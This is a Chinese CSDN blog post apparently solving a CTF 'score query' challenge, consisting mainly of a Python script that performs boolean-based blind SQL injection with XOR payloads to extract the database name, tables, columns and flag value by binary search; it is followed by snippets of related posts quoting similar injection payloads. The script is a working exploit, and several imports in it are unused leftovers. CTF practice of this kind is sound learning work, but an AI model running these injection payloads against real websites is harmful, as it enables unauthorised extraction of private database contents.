Bool盲注——成绩查询

最新推荐文章于 2024-07-26 14:20:58 发布
最新推荐文章于 2024-07-26 14:20:58 发布
阅读量3k 收藏
点赞数 1
文章标签: 数据库 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Forever_Han13/article/details/122905402
版权 
from aiohttp import Payload
from cherrypy import url
import requests
import time

from sympy import parallel_poly_from_expr

url = "http://0cfdc5c8-c87c-4e7f-b632-7f6c6ff7a2d0.node4.buuoj.cn:81/?stunum="

payload1 = "1^(ascii(substr((select(database())),{},1))>{})^1"
payload2 = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),{},1))>{})^1"
payload3 = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),{},1))>{})^1"
payload4 = "1^(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))>{})^1"
database = ""

for x in range(1, 1000):
    low = 32
    high = 127
    mid = (low+high) // 2
    while low < high:
        playload = payload4.format(x, mid)
        new_url = url + playload
        r = requests.get(new_url)
        if "Hi admin, your score is: 100" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low+high) // 2
    if (mid == 32 or mid == 132):
        break
    database += chr(mid)
    print(database)
    time.sleep(1)


print(database)
# ctf
# flag,score
# flag,value
N1etzsche
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql bool盲注_bool盲注+各种姿势绕过过滤和替换
weixin_35019679的博客
01-27 802
题目来源题目界面比较简单,只让你输入id,输对了告诉你 You are in,输错了就 You are not in可以想到这是一个盲注,经简单测试,提交字母a进不去,1可以。也就是说通过注入如果进去了,说明注入的语句成功执行,反之没有执行,典型的bool盲注bool盲注的一般思路一般来说,bool盲注通常是通过一位一位爆破字符来实现的,常用的函数如下:1234567891011121314151...
pikachu——布尔盲注
Lollipop_zhi的博客
03-02 6569
基于boolean的盲注主要表现: 1.没有报错信息 2.不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或者1) 3.在正确的输入下,输入and 1=1/and 1= 2发现可以判断 首先用’来测试一下 然后输入kobe’ and 1=1#,当改成1=2时,显示“不存在”。此时,说明存在SQL注入点,因为会把我们输入的 1=1,1=2执行 输入kobe’ and ascii(substr(database(),1,1))>113# 显示“不存在” (因为手工
sql注入之bool盲注
banliyaoguai的博客
05-12 564
二分法的思想很简单,因为整个数组是有序的,数组默认是递增的。首先选择数组中间的数字和需要查找的目标值比较如果相等最好,就可以直接返回答案了如果不相等如果中间的数字大于目标值,则中间数字向右的所有数字都大于目标值,全部排除如果中间的数字小于目标值,则中间数字向左的所有数字都小于目标值,全部排除。
pikachu(bool盲注)
ANYOUZHEN的博客
05-11 456
关于bool盲注的原理:由于对方后端对用户的显示页面进行了处理,我们无法看到返回的数据库报错内容 由于进行处理,我们在页面输入框中输入‘时不会返回数据库报错内容 输入kobe’ and 1=1# 我们可以使用select语句去判断: select ascii(substr(database(),1,1))>113; 它会返回0或者1,0是错的意思,1是对的意思 select ascii(substr(database(),1,1)>112; 通过判断0或者1 通过多次查询,我
SQL注入学习——Bool盲注详解 sqli-labs(Less 8)
未完成的歌~的博客
07-29 6251
Less-7导出文件GET字符型注 打开页面输入?id=1 试了很多发现报错信息都一样,查看下源代码: if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; ......
SQL bool盲注和时间盲注详解
永远是少年
07-21 1014
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL bool盲注和时间盲注。 一、bool盲注和时间盲注常用函数 二、bool盲注和时间盲注payload
攻防_漏洞_SQL注入_bool盲注
redglare的博客
12-01 1104
import requests import string url = 'http://127.0.0.1:18888/sql/p7/index.php?id=2' #url flag = '' print(len(string.printable)) for i in range(1,30): l,r = 32, 127 while l < r: m = (l+r) // 2 payload = '-if(ascii(substr((select g
SQL注入之Bool盲注(510cms)
qq_45775897的博客
01-05 2957
SQL注入之get可以参考: https://blog.csdn.net/qq_45775897/article/details/122332051 一、查找是否存在SQL注入(注入点) 以510企业网站为例: 这里以漏洞参数id为例 用?id=1和id=1'进行测试,前提能够正常显示。 在?id=1后面加上and 1=1两个结果都是真的,所以正常输出; 后面加上and 1=2如果正常输出,说明前后都是真的,则表示是字符型。反之是数值型 eg: http://IP地址(域名)/news.php?cid=&
6、盲注bool
weixin_51520483的博客
05-18 563
1、注意在页面不报错的情况下,如何获取bool返回值,多学习其他的获取语法。
综合bool盲注脚本.py
07-15
可以适用于部分SQL注入题目
布尔盲注python脚本.zip
12-28
布尔盲注Boolean-Based Blind Injection)是一种常见的SQL注入攻击方式,它主要针对那些不返回完整查询结果或不显示任何错误信息的Web应用程序。在这种类型的注入中,攻击者通过观察服务器响应时间或状态来判断SQL...
成绩查询与修改 c++小软件
06-07
成绩查询与修改 c++小软件】 在IT领域,编程是实现各种功能的基础,而C++作为一种强大的面向对象的编程语言,常被用于开发高效、灵活的应用程序。本软件"成绩查询与修改 c++小软件"就是利用C++语言编写的,...
bool当成函数参数错误理解
09-05
在编程中,布尔类型(bool)常常用于表示逻辑状态,如真或假。然而,将布尔值用作函数参数有时会导致代码可读性降低,这可能是由于双重否定、语义模糊或者缺乏上下文理解造成的。当函数参数为bool时,程序员需要通过...
yy.zip_bool insert
09-24
把在链表中插入语删除节点的操作写成一个函数。 bool insert(Node *&h,int a,int pos) pos(>=0)为0的时候在表头插入,否则在第pos个结点的后面插入。 bool remove(Node *&h,int &a,int pos)
数据库查询与操作指南-以Nebula图数据库为例
DZSpace,专注于计算机科学与技术领域的技术博主,致力于分享实用知识与技巧,帮助读者快速掌握技术要点,共同探索计算机世界的无限可能。欢迎访问DZSpace的博客,一起学习进步!
07-26 289
数据库查询与操作指南-以Nebula图数据库为例
ODBC连接达梦数据库
qq_55187735的博客
07-24 258
用户执行,因为环境变量配置在。
SQL基础入门:解锁数据库管理的钥匙
最新发布
WayneYalejk的博客
07-26 357
在数字化时代,数据已成为企业最宝贵的资产之一。为了高效地存储、查询和管理这些数据,SQL(Structured Query Language,结构化查询语言)应运而生。SQL不仅是数据库管理员的必备技能,也是数据分析师、开发人员等多个领域从业者的重要工具。本文将带您踏入SQL的世界,从基础概念到实际应用,一步步解锁数据库管理的钥匙。强调SQL在数据处理和分析中的重要性,鼓励读者通过实践不断深化对SQL的理解和应用。
ubuntu20.04服务器搭建mongodb7
glovenone的专栏
07-25 759
ubuntu安装mongodb
Es boolquery 怎么精确查询
04-14
es boolquery 中可以使用 match_phrase 查询,它可以精确匹配短语。例如,您可以使用以下查询实现精确查询: ``` { "query": { "bool": { "must": { "match_phrase": { "content": "精确查询的词" } } } }...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值